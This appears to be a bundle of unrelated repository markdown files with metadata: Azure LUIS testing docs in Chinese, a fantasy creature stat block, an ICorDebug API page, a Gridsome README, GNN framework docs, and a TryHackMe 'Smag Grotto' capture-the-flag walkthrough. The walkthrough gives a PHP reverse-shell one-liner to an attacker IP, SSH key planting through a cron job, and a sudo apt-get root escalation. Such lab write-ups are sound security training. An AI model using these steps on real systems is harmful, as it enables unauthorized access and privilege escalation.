name="designing-batch-tests"></a>设计批处理测试 批处理测试集应包含大量测试用例,旨在跨 LUIS 应用中的所有意向和所有实体进行测试。 有关定义批处理测试集的信息,请参阅 [LUIS 门户中的批处理测试](/cognitive-services/luis/luis-concept-batch-test)。 ### <a name="running-tests"></a>运行测试 LUIS 门户提供的功能可帮助进行交互式测试: * 通过[交互式测试](/cognitive-services/luis/luis-concept-test),可以提交示例言语,并获取 LUIS 识别的意向和实体的响应。 通过视觉检测来验证测试是否成功。 * [批处理测试](/cognitive-services/luis/luis-concept-batch-test)使用批处理测试文件作为输入来验证活动训练版本,以判断其预测准确性。 批处理测试可帮助你查看活动版本中每个意向和实体的准确性,并使用图表显示结果。 #### <a name="running-tests-in-an-automated-build-workflow"></a>在自动生成工作流中运行测试 LUIS 门户中的交互式测试功能非常有用,但对于 DevOps,在 CI/CD 工作流中执行的自动测试具有某些要求: * 测试工具必须在生成服务器上的工作流步骤中运行。 这意味着工具必须能够在命令行上运行。 * 测试工具必须能够对终结点执行一组测试,并根据实际结果自动验证预期结果。 * 如果测试失败,则测试工具必须返回状态代码以暂停工作流并“让生成失败”。 LUIS 不提供命令行工具,可不提供可提供这些功能的高级 API。 建议使用 [NLU.DevOps](https://github.com/microsoft/NLU.DevOps) 工具,在命令行和 CI/CD 工作流中的自动测试期间运行测试和验证结果。 LUIS 门户中可用的测试功能不需要已发布的终结点,并且属于 LUIS 创作功能。 在自动生成工作流中实现测试时,必须将要测试的 LUIS 应用版本发布到到终结点,以便测试工具(如 NLU.DevOps)可以在测试过程中发送预测请求。 > [!TIP] > * 如果要实现自己的测试解决方案并编写代码将测试言语发送到终结点,请记住,如果使用 LUIS 创作密钥,则允许的事务速率被限制为 5TPS。 限制发送速率,或改用预测密钥。 > * 将测试查询发送到终结点时,请记住在预测请求的查询字符串中使用 `log=false`。 这可确保测试言语不会被 LUIS 记录下来,并最终出现在 LUIS [主动学习](/cognitive-services/luis/luis-concept-review-endpoint-utterances)功能提供的终结点言语评审列表中,从而被意外地添加到应用的训练言语。 #### <a name="running-unit-tests-at-the-command-line-and-in-cicd-workflows"></a>在命令行和 CI/CD 工作流中运行单元测试 可以使用 [NLU.DevOps](https://github.com/microsoft/NLU.DevOps) 包,在命令行运行测试: * 使用 NLU.DevOps [测试命令](https://github.com/microsoft/NLU.DevOps/blob/master/docs/Test.md)将测试文件中的测试提交到终结点,并在文件中捕获实际的预测结果。 * 使用 NLU.DevOps [比较命令](https://github.com/microsoft/NLU.DevOps/blob/master/docs/Analyze.md)将实际结果与输入测试文件中定义的预期结果进行比较。 `compare` 命令生成 NUnit 测试输出,在通过使用 `--unit-test` 标志使用[单元测试模式](https://github.com/microsoft/NLU.DevOps/blob/master/docs/Analyze.md#unit-test-mode)时,将断言所有测试都通过。 ### <a name="running-batch-tests-at-the-command-line-and-in-cicd-workflows"></a>在命令行和 CI/CD 工作流中运行批处理测试 还可以使用 NLU.DevOps 包,用于在命令行运行批处理测试。 * 使用 NLU.DevOps [测试命令](https://github.com/microsoft/NLU.DevOps/blob/master/docs/Test.md)将测试文件中的测试提交到终结点,并在文件中捕获实际的预测结果,与单元测试相同。 * 在[性能测试模式](https://github.com/microsoft/NLU.DevOps/blob/master/docs/Analyze.md#performance-test-mode)下使用 NLU.DevOps [比较命令](https://github.com/microsoft/NLU.DevOps/blob/master/docs/Analyze.md)衡量应用的性能,还可以将应用的性能与基线性能基准进行比较,例如最新提交到主版本或当前版本的结果。 在性能测试模式中,`compare` 命令生成 NUnit 测试输出,并以 JSON 格式生成[批处理测试结果](/cognitive-services/luis/luis-glossary#batch-test)。 ## <a name="luis-non-deterministic-training-and-the-effect-on-testing"></a>LUIS 非确定性训练和对测试的影响 LUIS 训练模型(例如意向)时,既需要正数据(为模型训练应用而提供的标记的训练言语),也需要负数据(不是模型用途有效示例的数据)。 在训练过程中,LUIS 将从为其他模型提供的所有正数据生成一个模型的负数据,但在某些情况下,可能会导致数据不平衡。 为了避免这种不平衡,LUIS 以非确定性的方式为负数据的一个子集进行采样,进行优化以获得更平衡的训练集、提高模型性能并缩短训练时间。 这种非确定性训练的结果是,可能会[在不同的培训会话之间得到略微不同的预测响应](/cognitive-services/luis/luis-concept-prediction-score),通常用于[预测分数](/cognitive-services/luis/luis-concept-prediction-score)不高的意向和/或实体。 如果要为出于测试目的而生成的 LUIS 应用版本禁用非确定性训练,请使用[版本设置 API](https://dev.cognitive.azure.cn/docs/services/5890b47c39e2bb17b84a55ff/operations/versions-update-application-version-settings),将 `UseAllTrainingData` 设置设为 `true`。 ## <a name="next-steps"></a>后续步骤 * 了解如何[实现 CI/CD 工作流](luis-concept-devops-automation.md) * 了解如何[通过 GitHub 为 LUIS 实现 DevOps](luis-how-to-devops-with-github.md)
44.880282
349
0.776244
yue_Hant
0.860153
53a3aa58120b2c229efd5f02faf55cde0e5bd56c
3,017
md
Markdown
_creatures/ink-devil.md
5ecompendium/bestiary2
cca658a7536f9e5afd795731bb70f96da700e76a
[ "MIT" ]
4
2019-09-16T12:25:41.000Z
2022-03-03T10:43:10.000Z
_creatures/ink-devil.md
5ecompendium/bestiary2
cca658a7536f9e5afd795731bb70f96da700e76a
[ "MIT" ]
null
null
null
_creatures/ink-devil.md
5ecompendium/bestiary2
cca658a7536f9e5afd795731bb70f96da700e76a
[ "MIT" ]
5
2019-08-21T18:50:47.000Z
2021-04-27T19:52:29.000Z
--- layout: creature name: "Ink Devil" tags: [small, fiend, cr2, tome-of-beasts] cha: 18 (+4) wis: 8 (-1) int: 20 (+5) con: 12 (+1) dex: 18 (+4) str: 12 (+1) size: Small fiend alignment: lawful evil challenge: "2 (450 XP)" languages: "Celestial, Common, Draconic, Infernal; telepathy (120 ft.)" skills: "Arcana +9, Deception +8, History +9, Stealth +8" senses: "darkvision 120 ft., passive Perception 9" saving_throws: "Dex +6" damage_immunities: "fire, poison" damage_resistances: "cold; bludgeoning, piercing, and slashing from nonmagical weapons that aren't silvered" condition_immunities: "poisoned" speed: "30 ft." hit_points: "54 (12d6 + 12)" armor_class: "14" --- ***Devil's Sight.*** Magical darkness doesn't impede the devil's darkvision. ***Magic Resistance.*** The devil has advantage on saving throws against spells and other magical effects. ***Innate Spellcasting.*** The ink devil's spellcasting ability is Charisma (spell save DC 14). The ink devil can cast the following spells, requiring no material components: * At will: <i>detect magic, illusory script, invisibility, teleportation </i>(self plus 50 lb of objects only) * 1/day each: <i>glyph of warding, planar ally </i>(1d4 + 1 lemures 40 percent, or 1 ink devil 25 percent) ### Actions ***Bite.*** Melee Weapon Attack: +6 to hit, reach 5 ft., single target. Hit: 11 (2d6 + 4) piercing damage. ***Claw.*** Melee Weapon Attack: +6 to hit, reach 5 ft., single target. Hit: 14 (3d6 + 4) slashing damage. ***Corrupt Scroll.*** An ink devil can corrupt the magic within any scroll by touch. Any such corrupted scroll requires a DC 13 Intelligence saving throw to use successfully. If the check fails, the scroll's spell affects the caster if it is an offensive spell, or it affects the nearest devil if it is a beneficial spell. ***Devil's Mark.*** Ink devils can flick ink from their fingertips at a single target within 15 feet of the devil. The target must succeed on a Dexterity saving throw (DC 13), or the affected creature gains a devil's mark: a black, red, or purple tattoo in the shape of an archduke's personal seal (most often Mammon or Totivillus but sometimes Arbeyach, Asmodeus, Beelzebub, Dispater, or others). All devils have advantage on spell attacks made against the devil-marked creature, and the creature has disadvantage on saving throws made against spells and abilities used by devils. The mark can be removed only by a remove curse spell or comparable magic. In addition, the mark detects as faintly evil and often shifts its position on the body. Paladins, witchfinders, and some clerics may consider such a mark proof that a creature has made a pact with a devil. ### Bonus Actions ***Disrupt Concentration.*** Their sharp, shrill tongues and sharper claws make ink devils more distracting than their own combat prowess might indicate. An ink devil can force a single foe within 30 feet of the ink devil to make a DC 13 Wisdom saving throw or lose concentration until the beginning of the target's next turn.
61.571429
862
0.751077
eng_Latn
0.994964
53a4ea5f987d47c8af971334ec2fd6621143909f
3,897
md
Markdown
hacking/_posts/2020-07-31-smag.md
0xordinaryday/blog
8b7bc6c3ad43f6631daa5337b2f2e4f6e3656ac4
[ "MIT" ]
null
null
null
hacking/_posts/2020-07-31-smag.md
0xordinaryday/blog
8b7bc6c3ad43f6631daa5337b2f2e4f6e3656ac4
[ "MIT" ]
3
2021-05-20T19:06:26.000Z
2021-09-12T09:55:32.000Z
hacking/_posts/2020-07-31-smag.md
0xordinaryday/blog
8b7bc6c3ad43f6631daa5337b2f2e4f6e3656ac4
[ "MIT" ]
null
null
null
--- layout: post title: "THM - Smag Grotto" date: 2020-07-31 18:00:00 +1000 category: hacking --- ## Introduction *Do you remember how to analyse packets?* This is a easy rated box. Let's begin. ## Ports nmap says we've got 22 (SSH) and 80 (HTTP) only. ## Webserver There's not much on the home page for the website, so we'll run a quick gobuster: `` root@kali:/opt/tryhackme/smag# gobuster dir -u http://10.10.184.160 -w /usr/share/dirb/wordlists/common.txt `` This turns up one interesting directory - mail. Checking that we get a message about a packet capture along with a download link. It says you have to download it with wget, although I'm sure that's not actually necessary. Let's do it anyway: {% highlight shell %} root@kali:/opt/tryhackme/smag# wget http://10.10.184.160/aW1wb3J0YW50/dHJhY2Uy.pcap --2020-07-31 03:52:52-- http://10.10.184.160/aW1wb3J0YW50/dHJhY2Uy.pcap Connecting to 10.10.184.160:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1209 (1.2K) [application/vnd.tcpdump.pcap] Saving to: ‘dHJhY2Uy.pcap’ dHJhY2Uy.pcap 100%[====================================================================>] 1.18K --.-KB/s in 0s 2020-07-31 03:52:53 (29.8 MB/s) - ‘dHJhY2Uy.pcap’ saved [1209/1209] {% endhighlight %} ## PCAP We can open the packet capture in Wireshark and it's very straightforward, we find a POST request with some important details, being a new subdomain: http://development.smag.thm/login.php and some credentials: **helpdesk:REDACTED** We add development.smag.thm to our /etc/hosts and continue. ## Admin.php Once we go to development.smag.thm/login.php and authenticate, we get a page that says 'enter a command'. Any number of commands can be tried but none of them appear to do anything....until you start a listener and try a reverse shell: `` php -r '$sock=fsockopen("10.9.10.123",1234);exec("/bin/sh -i <&3 >&3 2>&3");' `` Thanks, [pentestmonkey](pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet). ## On the box As usual I run linpeas; this time we find a cron job: `` root /bin/cat /opt/.backups/jake_id_rsa.pub.backup > /home/jake/.ssh/authorized_keys `` So the job is copying jake's public key to the authorized keys file. Good to know. ## SSH-keygen Let's generate a new SSH key with ssh-keygen: {% highlight shell %} root@kali:/opt/tryhackme/smag# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa {% endhighlight %} Once that's done (with the passphrase of 'yolo'), we can get it on the box and we can append it to the jake_id_rsa.pub.backup file and wait for the cron job to run. {% highlight shell %} wget http://10.9.10.123:8000/id_rsa.pub --2020-07-31 04:17:32-- http://10.9.10.123:8000/id_rsa.pub Connecting to 10.9.10.123:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 563 [application/octet-stream] Saving to: 'id_rsa.pub' id_rsa.pub 100%[===================>] 563 --.-KB/s in 0s 2020-07-31 04:17:33 (106 MB/s) - 'id_rsa.pub' saved [563/563] www-data@smag:/dev/shm$ /bin/cat id_rsa.pub >> /opt/.backups/jake_id_rsa.pub.backup {% endhighlight %} ## Jake Now we can login as jake with our passphrase: `` root@kali:/opt/tryhackme/smag# ssh -i id_rsa [email protected] `` Running **sudo -l** gives us this: {% highlight shell %} jake@smag:~$ sudo -l Matching Defaults entries for jake on smag: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User jake may run the following commands on smag: (ALL : ALL) NOPASSWD: /usr/bin/apt-get {% endhighlight %} And [GTFOBins](https://gtfobins.github.io/gtfobins/apt-get/) does the rest: {% highlight shell %} jake@smag:~$ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh # whoami root {% endhighlight %}
33.886957
241
0.691301
eng_Latn
0.844307
53a53cf5e18f321cb6a05543d4edd969a2cb2c68
2,709
md
Markdown
docs/framework/unmanaged-api/debugging/icordebugappdomain3-getcachedwinrttypesforiids-method.md
rscprof/docs.ru-ru
9c2a47b4b444efb88ed2c2d943b09721415d5ed0
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/framework/unmanaged-api/debugging/icordebugappdomain3-getcachedwinrttypesforiids-method.md
rscprof/docs.ru-ru
9c2a47b4b444efb88ed2c2d943b09721415d5ed0
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/framework/unmanaged-api/debugging/icordebugappdomain3-getcachedwinrttypesforiids-method.md
rscprof/docs.ru-ru
9c2a47b4b444efb88ed2c2d943b09721415d5ed0
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Метод ICorDebugAppDomain3::GetCachedWinRTTypesForIIDs ms.date: 03/30/2017 api_name: - ICorDebugAppDomain3.GetCachedWinRTTypesForIIDs api_location: - mscordbi.dll api_type: - COM f1_keywords: - ICorDebugAppDomain3::GetCachedWinRTTypesForIIDs helpviewer_keywords: - ICorDebugAppDomain3::GetCachedWinRTTypesForIIDs method, [.NET Framework debugging] - GetCachedWinRTTypesForIIDs method, ICorDebugAppDomain3 interface [.NET Framework debugging] ms.assetid: 23682ca0-1bcf-48e6-996e-69f7ba337682 topic_type: - apiref author: rpetrusha ms.author: ronpet ms.openlocfilehash: 7c8c82b3ace19d4b1d79fbfd296ce239e6da99ef ms.sourcegitcommit: 3d5d33f384eeba41b2dff79d096f47ccc8d8f03d ms.translationtype: HT ms.contentlocale: ru-RU ms.lasthandoff: 05/04/2018 ms.locfileid: "33409561" --- # <a name="icordebugappdomain3getcachedwinrttypesforiids-method"></a>Метод ICorDebugAppDomain3::GetCachedWinRTTypesForIIDs Возвращает перечислитель для кэшированных [!INCLUDE[wrt](../../../../includes/wrt-md.md)] типов в домене приложения на основе их интерфейс идентификаторов. ## <a name="syntax"></a>Синтаксис ``` HRESULT GetCachedWinRTTypesForIIDs ( [in] ULONG32 cReqTypes, [in] GUID *iidsToResolve, [out] ICorDebugTypeEnum **ppTypesEnum ); ``` #### <a name="parameters"></a>Параметры `cReqTypes` [in] Количество требуемых типов. `iidsToResolve` [in] Указатель на массив, содержащий идентификаторы интерфейса, соответствующего управляемого представления [!INCLUDE[wrt](../../../../includes/wrt-md.md)] типы должны быть получены. `ppTypesEnum` [out] Указатель на адрес объекта интерфейса «ICorDebugTypeEnum», позволяет использовать кэшированные перечисления управляемых представления [!INCLUDE[wrt](../../../../includes/wrt-md.md)] типы, полученные на основе идентификаторов интерфейса в `iidsToResolve`. ## <a name="remarks"></a>Примечания Если метод не может получить сведения для идентификации определенного интерфейса, соответствующую запись в коллекции «ICorDebugTypeEnum» будет иметь тип `ELEMENT_TYPE_END` ошибок из-за проблемы извлечения данных, или `ELEMENT_TYPE_VOID` для Неизвестный интерфейс идентификаторы. ## <a name="requirements"></a>Требования **Платформы:** [!INCLUDE[wrt](../../../../includes/wrt-md.md)] **Заголовок:** CorDebug.idl, CorDebug.h **Библиотека:** CorGuids.lib **Версии платформы .NET framework:** [!INCLUDE[net_current_v45plus](../../../../includes/net-current-v45plus-md.md)] ## <a name="see-also"></a>См. также [Интерфейс ICorDebugAppDomain3](../../../../docs/framework/unmanaged-api/debugging/icordebugappdomain3-interface.md)
42.328125
281
0.74234
yue_Hant
0.148076
53a55397aa2e88b6a2045f1be59c152c9fa66cf0
1,216
md
Markdown
packages/cli/README.md
morphatic/gridsome
12c486545170feb4096ffd88600e618873884a9a
[ "MIT" ]
3
2021-04-30T23:37:53.000Z
2021-12-07T21:43:04.000Z
packages/cli/README.md
morphatic/gridsome
12c486545170feb4096ffd88600e618873884a9a
[ "MIT" ]
74
2019-07-20T01:37:16.000Z
2021-08-03T20:27:32.000Z
packages/cli/README.md
morphatic/gridsome
12c486545170feb4096ffd88600e618873884a9a
[ "MIT" ]
2
2020-07-15T14:02:07.000Z
2020-07-15T14:03:36.000Z
# @gridsome/cli > A command line tool for creating new Gridsome projects. ## Installation Install globally with `npm install --global @gridsome/cli` or `yarn global add @gridsome/cli` ## Creating new projects Run `gridsome create {name} {starter}` to create a new Gridsome project. - **name** - directory name to create the project in - **starter** - optional starter kit name | Official starter kits | | | --------------------- | --------------------------------------- | | Default | `gridsome create my-website` | | WordPress | `gridsome create my-blog wordpress` | ## Start local development Run `gridsome develop` inside the project directory to start a local development server. The server will start at `http://localhost:8080/` with hot-reloading etc. ## Explore GraphQL schema and data Run `gridsome explore` to start [GraphQL Playground](https://github.com/prisma/graphql-playground) and explore your schema or data. Open your browser and go to `http://localhost:8080/___explore` to start exploring. ## Build for production Run `gridsome build` to generate a static site inside a `dist` directory in your project.
34.742857
98
0.660362
eng_Latn
0.971215
53a5a67de3c77aa66c7d2a5b601f4f9c3f5fd238
48,569
md
Markdown
docs/model_description.md
BNN-UPC/ignnition
905e4aa756ad6dd92d620f5f8b37d8190bb5273a
[ "BSD-3-Clause" ]
18
2021-06-09T15:52:55.000Z
2022-03-28T05:54:14.000Z
docs/model_description.md
BNN-UPC/ignnition
905e4aa756ad6dd92d620f5f8b37d8190bb5273a
[ "BSD-3-Clause" ]
11
2021-06-03T07:55:04.000Z
2022-03-11T16:54:15.000Z
docs/model_description.md
knowledgedefinednetworking/ignnition
905e4aa756ad6dd92d620f5f8b37d8190bb5273a
[ "BSD-3-Clause" ]
12
2020-07-07T16:45:09.000Z
2021-04-05T15:55:30.000Z
# Model Descripton ## Multi-stage Message Passing In order to efficiently define *GNN* models, we propose a novel high-level abstraction called the *Multi-Stage Message Passing graph* (hereafter *MSMP* graph). Particularly, this abstraction mainly addresses the principles of simplicity and versatility. As such, it abstracts users from all the mathematical formulation behind *GNNs* and the programming obstacles imposed by traditional Deep Learning languages. Additionally, this abstraction also addresses the principle of reliability by providing a full picture of the message passing within *GNNs*, clearly identifying the different message passing phases and the relationships between the entities involved. The *MSMP* graph abstraction provides an interface with a flexible modular design, providing support for any variant of state-of-the-art *GNN* architectures as well as custom combinations of individual components present in existing *GNNs* (e.g., messages, aggregations, updates, loss, normalization functions). In the networking field, *GNN* models are usually non-standard. They often need to be highly customized in order to adapt to complex network scenarios, usually addressing challenging modeling or optimization problems. Thus, proposed solutions typically require tailor-made *GNN* architectures including different element types in graphs (e.g., forwarding devices, links) and message-passing schemes divided in multiples phases sequentially arranged. In this context --- and in line with the focus on network applications of *IGNNITION ---* one main novelty of the proposed *MSMP* graph abstraction is that it provides support to define message passings divided in multiple stages and including different types of elements (also called *entities*). To the best of our knowledge, this enables to implement all the existing GNN architectures applied to networking to date. ![General MSMP definition](Images/general_msmp.png) Particularly, with the *MSMP* graph abstraction, a *GNN* design can be intuitively defined by a set of graph entities and how they relate to each other in a sequential order, which eventually describes a message-passing iteration of the *GNN*. Fig.~\ref{fig:abstraction_graph} illustrates an example of a *GNN* with three different entity types (*e1*, *e2* and *e3*). In this MSMP graph, we can observe two differentiated stages in the message passing. In the first stage, entities of type *e1* and *e2* send their hidden states to their neighbors of type *e3* according to the connections of the input graph. Then, in the second stage, $e3$ entities send their states to the linked entities of type *e1* and *e2*. This process is then repeated a number of iterations *T* to make the states converge to some fixed values. Thus, *IGNNITION* supports any *GNN* that can be represented as an *MSMP* graph. This broadly includes the main state-of-the-art *GNN* architectures and all their variants, such as *Graph Attention Networks*, *Graph Convolutional Networks*, *Gated Neural Networks* , *Graph LSTM*, *Typed Graph Networks* , *Hypergraph Neural Networks*, and many others. In order to further illustrate this abstraction, we shall focus on *RouteNet*, which is a representative *GNN* model applied to networking. *RouteNet* was proposed as a solution to efficiently model performance in networks. To do this, in the original paper the authors formulate a complex mathematical model with a hypergraph that includes two types of entities: *(i)* the links of the input topology, and *(ii)* the end-to-end paths formed by the routing configuration. However, with *MSMP* graphs *RouteNet* can be easily defined by a two-stage message passing scheme including the two entities involved and how they exchange their states (as shown in the figure below). ![RouteNet MSMP definition](Images/msmp_routenet.png) In particular, in this *GNN* each *link* first shares its state with all its related paths (i.e., the *paths* that traverse the link). Afterward, each path sends its state to its related *links* (i.e., the *links* that form the *path*). Note that in this two-stage message passing, the input graph of the *GNN* does not have a direct mapping to the network topology itself, but instead graph nodes are the different entities included in the MSMP graph (i.e., links and paths), and edges are the relationships between these elements. Thus, messages are not necessarily sent physically over the network. They are just logical objects that represent the exchange of hidden states between links and paths. In the end, this abstraction enables to create a simple interface with users, which can easily define their own *GNN* models adapted to specific problems, just by defining the entities involved and their relationships. Lastly, *IGNNITION* produces an efficient implementation of the designed *GNN* in *TensorFlow*. ## Generate your GNN In order to define the architecture of the GNN we aim to create, the user is asked to define a model_description.yml file. This file will contain several sections that will define different aspects of our GNN. More specifically, the sections we must filled are:<br> 1. [Entity definition](#step-1-entity-definition)<br> 2. [Message passing definition](#step-2-message-passing-definition)<br> 3. [Readout definition](#step-3-readout-definition)<br> 4. [Internal Neural Network definition](#step-4-internal-neural-networks-definition) Let us now go a little bit in more detail into each of these sections. ### Step 1: Entity definition When designing a GNN, we might find situations in which not all the nodes in the graph behave /represent the same object. For this, we might need to consider different behaviours depending on the type of node in question. For this, we shall refer to an entity as a type of node in the graph. ![MSMP definition](Images/entities.png) From this example, we can observe that two entities must be created. Consequently, our model_description file must include a definition for each of them. Let us briefly describe how this can be done. ```yaml - entity: entity1 state_dimension: 32 initial_state: - type: build_state input: [feature1, feature2] - entity: entity2 state_dimension: 32 initial_state: - type: build_state input: [feature3] ``` In the code from above, we can see that we simply have to create a list of two entities (this will depend on the problem). Then, for each of the entities we first indicate its name, which we will use throughout the rest of the definition of the GNN to refer to these type of nodes. Additionally, we provide the dimension of the states that each of these nodes will have. Finally, we must indicate how the initial state is computed. For this definition, we must provide a list of "operations" which increasingly define the the resulting initial state. For simplicity, in these example, we simply define an initial state with *feature1* and *feature2*, and the rest of dimensions will be padded with 0s. Note that we do similarly with *entity2*. ### Step 2: Message passing definition At this point, we must define the core part of the GNN algorithm, which is the neural message-passing phase. In this phase, we define how the different nodes in the graph exchange messages with each other, in order to produce node-embeddings that properly consider the structural information of the graph. For this, let us define some terminology that will help us to easily describe potentially very complex GNN. #### What is a single message-passing? The message-passing phase is the process of nodes from the graph sending messages to other nodes of the graph. Note, however, from the previous sections that in a complex setting, we might have numerous different types of nodes in the graph which we want to consider independently. For this, we must further generalize the idea of message-passing to make the appropriate considerations. In this context, thus, we shall refer to a single message-passing to the process of the nodes that are of the source entity types *(a,b,..., k)* sending messages to a destination entity *dest_entity*. In the most simple scenario, we might want to define a single message-passing as the process of nodes of type *a* sending messages to the nodes of type *b*. In other scenarios, however, entities *a* and *b* might be sending simultaniously messages to another entity's nodes *c*. #### How to define a single message-passing? At this point, in order to illustrate this idea, let us suppose we are considering a single message-passing, such that nodes from entities *a* and *b* simultaniously send messages to the corresponding nodes of entity *c*. For this, we must define the following functions: ##### Message function This message function is defined for each of the source entities to the given destination entity. The message function will define how the source nodes will form the message that they will send to their corresponding destination nodes. Below we provide a visualization for this process through an arbitrary graph of 3 different nodes. ![MSMP definition](Images/message.png) ##### Aggregation function Once we have defined the message function for each of the source entities (in this case, for the source entity *a* and for the entity *b* respectively), we need to define the aggregation function. The aggregation function defines how each of the destination nodes will take all the messages received from both entity *a* and *b*, and produce one single input. For this, *IGNNITION*, as seen before, allows a pipe-line of operations which incrementaly allow users to define potentially very complex strategys for this aggregation function. Below we show an illustration of this process, for simplicity, with an aggregation function consisting of a single operation which sums over all the messages into a single final input. ![MSMP definition](Images/aggregation.png) ##### Update function Finally, we reach the point in which each of the destination nodes has produced an aggregated input of all the messages received. It just remains to create the corresponding update function of the destination entity that describes how it will use this information to update its current hidden state. Following the same squema used before, the illustration below exemplifies graphically this process. ![MSMP definition](Images/update.png) #### Using stages to define chronological orderings? So far, we have talked about how we can create a single message-passing. One must note, however, that a complex GNN may contain many of this single message-passings. For this we need to be able to properly order them chronologically. In order to simplify this ordering, we create what we called a *stage*. A stage simbolizes a given time-step of the algorithm. Then, to create our GNN, we can create several *stages*, and we can then assign single message-passings to a given stage. To illustrate this, let us suppose we have created three single message-passings from the entities we have in the graph. Then, for instance, we might want to perform simultaniously the first two single message-passings, and once they are done, we execute the third one. This can be done by creating two different stages. We then assign the first two single message-passings to the first stage (first time-step) and then the third single message-passing to the second stage (second time-step). ![stages definition](Images/general_description_stages.png) #### Defining the message-passing phase First of all, we must define the number of iterations (num_iterations). This indicates the number of times that all the given stages will perform all their single message-passings. Afterwards, we can proceed to define a list of *stages*. For sake of simplicity, let us only define one, as two define more, we must just include more elements in the list of *stages*. To define a *stage*, the user must define all the *stage_message_passings*, these being all the *single message-passings* that must be executed during these time step (all of them simultaniously). Note that for each of them we define the three functions mentioned before (message function, aggregation function and update function). Visit [keywords](../model_description/#keyword-definition) to get more information about the exact keywords that you can use in these sections. ```yaml message_passing: num_iterations: 8 stages: stage_message_passings: destination_entity: c source_entities: - name: a message: type: direct_assignment - name: b message: type: direct_assignment aggregation: - type: sum update: type: recurrent_neural_network nn_name: recurrent1 ``` ### Step 3: Readout definition Once we have defined the message passing, it remains to define the readout. The readout function is the one in charge of taking some/all of the final states computed during the message-passing, and using them appropritly to predict the final label. For this, again, we allow full flexibility for this definition in the form of a pipe-line of operations (as seen before). For sake of simplicity, let's suppose we aim to make a prediction over a global property of the graph. For this, we want to sum together all the final states of the nodes of type *a*, and then pass this to a neural network that computes the *output_label*. In this case, we would need to define two operations. One that sums all the states together, and another one that passes this output to the neural network. Below we show how this would be done. ```yaml readout: - type: pooling type_pooling: sum input: [a] output_name: pooled_a - type: feed_forward input: [pooled_a] nn_name: readout_model output_label: my_label ``` As you can see, we make use of the field *output_name* to define a name for the output of the first operation, which can then use as input for the second operation. ### Step 4: Internal neural networks definition Finally, it only remains to define the Neural Networks. Notice that in all the previous sections we have not explicitely defined the actual architecture of the neural network, but rather only referenced it by its name. In this section, we must indicate the actual architecture of each of them. For instance, we show below how to create the *readout_model* Neural Network that we referenced in the readout. For this, we must define each of its layers. ```yaml neural_networks: - nn_name: readout_model nn_architecture: - type_layer: Dense units: 256 activation: sigmoid - type_layer: Dropout rate: 0.5 - type_layer: Dense units: 1 ``` In this example, we are linking the name *readout_model* to a neural network with three layers of type Dense, Dropout and another Dense. These definition is done through a list of layers (which can be arbitrarely long). An important consideration is that *IGNNTION* allows the use of all the layer types presented in [keras library](https://www.tensorflow.org/api_docs/python/tf/keras/layers). Moreover, each of this layers can have numerous parameters that tune its properties. For this, again, we support all the parameters accepted by Keras for each layer respectively. This is done by simply adding them to the properties of each layers (e.g., the activation function in the first Dense layer). If a parameter is not defined (in case this is stated to be an optional parameter in the Keras Documentation), then *IGNNITION* will use the default parameter used by Keras. ### Putting it into practice So far, this section has covered in a very general way how to define a *GNN*. To fully get your hands on this topic, we recommend you to check our [quick tutorial](quick_tutorial.md) where we put all these concepts into practice to solve the specific problem of finding the *shortest-path* of a graph. ## Keyword definition In this section we will focus in more depth on what are the keywords available to design each of the sections that themselves define the GNN, and how to use them. More specifically, we will cover the keywords for each of the following sections. - [Step 1: Entity definition](#step-1-entity-definition)<br> - [Step 2: Message-passing phase](#step-2-message-passing-phase)<br> - [Step 3: Readout](#step-3-readout)<br> - [Step 4: Internal Neural Network definition](#step-4-internal-neural-networks) ### Step 1: Entity definition In order to create the entities, we must define a list "entities". For this, we must define an object "Entity". We shall now describe the different keywords that the user must / can define to model the new entity, these being:<br> - [Parameter: name](#parameter-name)<br> - [Parameter: state_dim](#parameter-state_dim)<br> - [Parameter: initial_state](#parameter-initial_state) --- #### Parameter: name **Description:** Name that we assing to the new entity. This name is important as we will use it from now on to reference the nodes that belong to this entity. **Accepted values:** String of the choice of the user. E.g., below we show how we would define an entity of name *entity1*. ```yaml name: entity1 ``` --- #### Parameter: state_dim **Description:** Dimension of the hidden states of the nodes of this entity. **Accepted values:** Natural number ```yaml state_dim: 32 ``` --- #### Parameter: initial_state **Description:** Array of Operation object defining incrementally the initial_state. **Accepted values:** Array of [Operation objects](#operation-object). ### Step 2: Message-passing phase Now we define the keywords that the user can use to design the message passing phase of the present *GNN*. To do so, we will cover the following keywords:<br> - [Parameter: num_iterations](#parameter-num_iterations)<br> - [Parameter: stages](#parameter-stages) #### Parameter: num_iterations **Description:** Number of times that all the stages must be repeated (iteration of the message passing phase). **Accepted values:** Natural number (Normally between 3 and 8) ```yaml num_iterations: 8 ``` --- #### Parameter: stages **Description:** Stages is the array of stage object which ultimately define all the parts of the message passing. **Accepted values:** Array of [Stage objects](#stage, each of which represents a time-step of the algorithm. ### Stage: To define a stage, we must define all the single message passings that take place during that stage (a given time-step of the algorithm). This is to define all the single message-passing which define how potentially many entities send messages to a destination entity. #### Parameter: stage_message_passings **Description:** Contains the single message-passings (the process of one entity nodes sending messages to another one), which we assign to this stage (time-step of the algorithm) **Accepted values:** Array of [Single message-passing objects](#single-message-passing). ### Single message-passing: This object defines how the nodes of potentially many entity types send messages simultaniously to the nodes of a given destination entity. To do so, we must define the following parameters:<br> - [Parameter: destination](#parameter-destination)<br> - [Parameter: source_entities](#parameter-source_entities)<br> - [Parameter: aggregation](#parameter-aggregation)<br> - [Parameter: update](#parameter-update) #### Parameter: destination entity **Description:** Name of the destination entity of this single message-passing. In other words, the entity nodes receiving the messages. **Accepted values:** String. It must match the name of an entity previously defined (see [entity name](#parameter-name)). ```yaml destination_entity: my_dst_entity ``` --- #### Parameter: source_entities **Description:** Array of the source entities sending messages to the destination entity (defined before) in this single message-passing. This is, all these sending entities will send messages simultaniously to the defined destination entity. **Accepted values:** Array of [Souce entity objects](#source-entity). --- #### Parameter: aggregation **Description:** Defines the aggregation function, which will take as input all the messages received by each of the destination nodes respectively, and aggregates them together into a single representation. Note that, to define potentially very complex function, we define this as 